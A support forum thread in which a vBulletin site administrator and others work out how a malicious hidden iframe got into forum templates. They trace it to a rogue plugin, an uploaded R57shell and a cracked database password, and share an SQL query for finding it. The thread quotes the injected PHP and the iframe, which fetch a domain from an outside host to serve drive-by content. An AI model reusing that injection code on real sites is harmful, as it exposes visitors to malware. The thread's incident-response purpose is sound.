Announcement

Collapse
No announcement yet.

Code inserted in to my templates.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • DaveS
    replied
    Originally posted by wtrk View Post
    where you able to remove the malicious code completely?

    google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?
    Yes I was able to remove it all completely but it was hard work to identify.
    My site was I think only compromised for a few hours so I'm sure that helped with Google not picking anything up. Checking the Webmaster tools now it says that it hasn't found any malware.
    However because my server has been compromised and I can't be sure what else has been done I'm considering a full rebuild.. just to be sure.
    There's a definite lesson here in a being careful in use of 777 CHMOD'd directories! I had the attitude that it wouldn't really happen to me as my site is relatively small with 6000 uniques per day.
    So I've learnt a lesson the hard way.

    Leave a comment:


  • wtrk
    replied
    where you able to remove the malicious code completely?

    google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?
    Last edited by wtrk; Thu 25 Feb '10, 2:01pm.

    Leave a comment:


  • DaveS
    replied
    I don't think its specifically the AME product. Any of them could have been chosen in my case to hide the infection.
    I found running some SQL queries against the template or plugins table quite useful.
    So like this....
    Code:
    SELECT * FROM vb_plugin WHERE phpcode LIKE "%$lol%";

    Leave a comment:


  • wtrk
    replied
    im having the same problem. i had the ame product installed and have now removed it. i cant find any $lol in the templates but google webmaster tools shows me a bunch of threads that are infected so im deleting them now one by one to see if that fixes the problem.

    Leave a comment:


  • DaveS
    replied
    And found the plugin finally. The malicious code was in a plugin entitled......

    AME : Permission Hide

    Leave a comment:


  • DaveS
    replied
    I've found some more.... information.
    I've been searching the MySQL tables and have found the following in the vb_datastore table.
    However I'm not exactly sure what is in the datastore tables.
    I can see that there appear to be plugin's.
    Can anyone help me?

    $domain = file_get_contents('http://kornoval.com:21/domain/tb.txt');
    $id = '766';
    $hash = 'a25144ea1f7195206c5f614241cd4844';
    $lol = "<iframe name=\"fra\" width=\"1\" height=\"1\" scrolling=\"no\" frameborder=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://$domain/x/?id=$id&hash=$hash\"></iframe>";

    Leave a comment:


  • DaveS
    replied
    No. Thank you Lynne any help is appreciated.
    We've just found the source. My own stupid fault.
    A very old directory with 777 permissions that was used to store pics in.
    An R57shell script has been uploaded and then it looks like used to break the MySQL password. Which was the outage earlier this morning I assume.
    So any hacking was done via MySQL with the template presumably edited from there.

    Leave a comment:


  • Lynne
    replied
    Sorry, I'm not an expert on this sort of thing. Perhaps someone else can come along with more specifics on what to look for.

    Leave a comment:


  • DaveS
    replied
    Hi Lynne. Thank you for your reply.
    I have been looking over the various logs all day so far to see how this happened.

    Suspect file version - yes done the check. Nothing found.
    Access logs - Yes nothing in there.
    Looked in plugins - Nothing strange there.

    So I know that the template has been edited as taking out the added text has removed the malicious iframe code.

    I can't find the reference to $lol anywhere in vB and it must be in there somewhere.

    I think I may have been subject to an exploit as I'm not on the very latest version of 3.8. I will do that in a mo. I was going to go straight to vB4 but I'm not ready for 4 yet.

    Leave a comment:


  • Lynne
    replied
    Did you look through your access_logs? Look in your plugins? Run maintenance > diagnostics > suspect file versions and see if there is some strange file listed there.

    Leave a comment:


  • DaveS
    replied
    Hi.
    Right I now know that $lol was placed in the footer template for a couple of styles that were live.
    I assume that $lol then inserts the IFRAME code. However I can't find anything that mentions of $lol inthe variables or how it could have been done.
    So although I've now removed $lol from the templates I need to find out where that is and also to find out where it's happened.
    I could be that one of the Administrators has had their accounts hacked, I can't see anything in the control panel logs.
    The site was hammered this morning for about 2 hours so I guess that could have been a dictionary attack trying to crack an Admins password?
    Any help appreciated!
    Cheers
    Dave

    Leave a comment:


  • DaveS
    started a topic Code inserted in to my templates.

    Code inserted in to my templates.

    Hi I wonder if I could ask for some urgent help.
    I'm running vb 3.8.
    Someone has managed to add some code to my vB implementation that is calling a nasty script.
    However I can't see any changed php files or templates.
    Anyone ideas where I start with finding out what's happened here?

    HTML Code:
    <script type="text/javascript">
    <!--
    	// Main vBulletin Javascript Initialization
    	vBulletin_init();
    //-->
    </script>
    <iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://koren.in/x/?id=766&hash=a25144ea1f7195206c5f614241cd4844"></iframe>
    The attached source shows where the nasty iframe is getting embedded.
    Any help much appreciated.
    Thanks
    Dave
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X